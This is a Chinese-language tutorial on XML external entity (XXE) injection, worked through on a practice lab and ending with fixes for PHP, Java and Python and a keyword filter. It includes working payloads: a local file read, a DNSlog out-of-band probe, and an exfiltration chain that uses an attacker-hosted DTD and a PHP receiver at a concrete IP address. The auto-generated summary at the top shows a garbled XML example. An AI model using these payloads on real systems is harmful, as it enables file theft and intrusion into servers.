小编点评

**XXE 漏洞简介** XXE 漏洞是一种 Web 安全漏洞，它允许攻击者干扰应用程序对 XML 数据的处理。 **XXE 漏洞类型** XXE 漏洞发生在应用程序解析 XML 输入时，当没禁止外部实体的加载时。 **XXE 漏洞影响** XXE 漏洞可以允许攻击者： * 查看应用程序服务器文件系统上的文件系统 * 与应用程序本身可以访问的任何后端或外部系统进行交互 **XXE 漏洞示例** ```xml admin 1234 ``` **XXE 漏洞修复** * 禁用外部实体 PHP * 设置 DocumentBuilderFactory 的 expandEntityReferences 属性为 false * 使用 lxml 库解析 XML 数据，设置 resolve_entities 属性为 False

正文

web攻防--xxe实体注入

漏洞简介

XML 外部实体注入（也称为 XXE）是一种 Web 安全漏洞，允许攻击者干扰应用程序对 XML 数据的处理。它通常允许攻击者查看应用程序服务器文件系统上的文件，并与应用程序本身可以访问的任何后端或外部系统进行交互。

在某些情况下，攻击者可以利用 XXE 漏洞联合执行服务器端请求伪造(SSRF) 攻击，从而提高 XXE 攻击等级以破坏底层服务器或其他后端基础设施。

XML简介

XML被设计为传输和存储数据，XML文档结构包括XML声明、DTD文档类型定义（可选）、文档元素，其焦点是数据的内容，其把数据从HTML分离，是独立于软件和硬件的信息传输工具。等同于JSON传输。XXE漏洞XML External Entity Injection，即xml外部实体注入漏洞，XXE漏洞发生在应用程序解析XML输入时，没禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网扫描、攻击内网等危害

XML 与 HTML 的主要差异：
XML 被设计为传输和存储数据，其焦点是数据的内容。
HTML 被设计用来显示数据，其焦点是数据的外观。
HTML 旨在显示信息 ，而XML旨在传输存储信息。
Example：网站的xml文件解析

• XML语法参考如下文章
  CTF XXE
  从XML相关一步一步到XXE漏洞

漏洞发现

黑盒发现

1. 获取得到Content-Type或数据类型为xml时，尝试xml语言payload进行测试
2. 不管获取的Content-Type类型或数据传输类型，均可尝试修改后提交测试xxe
3. XXE不仅在数据传输上可能存在漏洞，同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行

白盒发现

1. 可通过应用功能追踪代码定位审计
2. 可通过脚本特定函数搜索定位审计
3. 可通过伪协议玩法绕过相关修复等

漏洞利用

通过搭建github上托管得xxe靶场进行复现xxe-lab
搭建效果如图

回显利用

抓包发现使用xml格式进行传输数据

直接构造payload进行尝试读取文件

payload

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE note [
<!ENTITY test SYSTEM  "file:///c:/1.txt">
]>
<user><username>&test;</username><password>pass</password></user>

成功读取文件内容

file：///                   #file协议读取文件
http://url/file.txt         #http协议读取站点下的文件
PHP://filter                                 #文件流形式读取php文件

无回显利用(oob)

将靶场中得回显语句注释掉即可得到无回显环境

无回显测试首先进行带外测试，查看XXE语句是否可以进行解析。
payload

<?xml version="1.0" ?>
<!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://g575cg.dnslog.cn">
    %file;
]>
<user><username>admin</username><password>1234</password></user>

测试返回结果报错了，查看该网址是否有访问记录

目标成功解析xml语句，并进行了访问

构造payload尝试进行读取文件
payload分为三部分

get.php放在用于接收数据得服务器上用于接受数据并保存为文件

<?php
$data=$_GET['file'];
$myfile=fopen("file.txt","w");
fwrite($myfile,$data);
fclose($myfile);
?>

test.dtd用于将读取到得数据赋值给get.php

<!ENTITY % all "<!ENTITY send SYSTEM 'http://101.200.161.174/get.php?file=%file;'>">

payload

<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///c:/1.txt">		#读取文件
<!ENTITY % remote SYSTEM "http://101.200.161.174/test.dtd">		#加载dtd文件
%remote;
%all;
]>

<root>&send;</root>	#触发test.dtd中的元素

在进行文件读取的时候，有些文件中带有空格，这样的话在将数据赋值给get.php文件时,get方法传参会将数据错误识别，这时候可以使用php://filter协议使用base64编码以数据流得形式读取文件。

漏洞修复

修复防御方案：

• 禁用外部实体
  PHP:
  libxml_disable_entity_loader(true);
  JAVA:
  DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);
  Python：
  from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

• 过滤用户提交的XML数据
  过滤关键词：<!DOCTYPE和<!ENTITY，或者SYSTEM和PUBLIC

扩展参考

CTF XXE
从XML相关一步一步到XXE漏洞

以上内容仅作参考学习，如有瑕疵或错误，希望各位师傅们斧正，感谢阅读。